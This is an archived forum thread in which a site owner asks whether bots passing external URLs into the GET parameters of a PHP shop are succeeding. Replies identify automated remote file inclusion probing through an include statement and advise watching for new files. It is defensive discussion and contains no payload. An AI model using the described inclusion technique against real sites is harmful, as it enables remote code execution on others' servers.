PDA

View Full Version : Is this hack working ?


phelum
03-16-2008, 07:53 AM
For the last few months one of my clients' sites has been attacked by robots (different URLs). I can't see that these attacks are working but I could be missing something.

The site has a online shop (PHP) and it looks like the requests are trying to get the server to access external sites because these requests contain URLs where a page name or product name or manufacturer name are expected.

An example from the server log is at http://phelum.net/temp/shop_log.txt. The shop is at http://belbinvideo.com/shop/.

Does anybody know what the robots are trying to do here and are they having any success ?

Razgo
03-16-2008, 08:23 AM
to me it looks normal. it looks like a log file that is showing what happens when people browse the site. "get" is like the SQL query the site makes when you click on something in the php shop.

phelum
03-16-2008, 05:28 PM
to me it looks normal. it looks like a log file that is showing what happens when people browse the site. "get" is like the SQL query the site makes when you click on something in the php shop.
I understand HTTP GET but the devil is in the detail in this log file. One example is that the remote site is trying to get an invalid page by including the suspect query string in the GET. Instead of the string specifying a valid page it is specifying a full URL which is probably some page the hacker can monitor to see if the shop software is requesting it. This looks like they are testing for a hole but I can't see the value here.

Jason Tokoph
03-16-2008, 06:20 PM
Look in the file that is being called and see where the $page variable is being used. If it is in an include statement then you will have problems and remote code will be executed.

EDIT: nvm, it is for sure someone looking for holes in your script, but it looks like it is completely automated. It will pass a URL into every GET parameter it sees. If "Just a test" is printed on the page, they know your site has a hole. Thats when damage occurs. Just keep a watch for any sketchy files 'appearing' on your site.

phelum
03-16-2008, 06:37 PM
Look in the file that is being called and see where the $page variable is being used. If it is in an include statement then you will have problems and remote code will be executed.
I have a script that checks for recent file changes so I will check the account. Every case where I checked these hacks always results in the default page being returned and this is why I think it is safe. But the GETs from the robots are trying wacky things such as multiple '&'s probably to try and confuse the parse logic. I am a bit worried however because these attacks are occurring on a daily basis so maybe they are getting somewhere.

I take your point about 'include' being a possible weak point so I will search further.

Update: I've just checked the account and the only changed files are the PHP session files.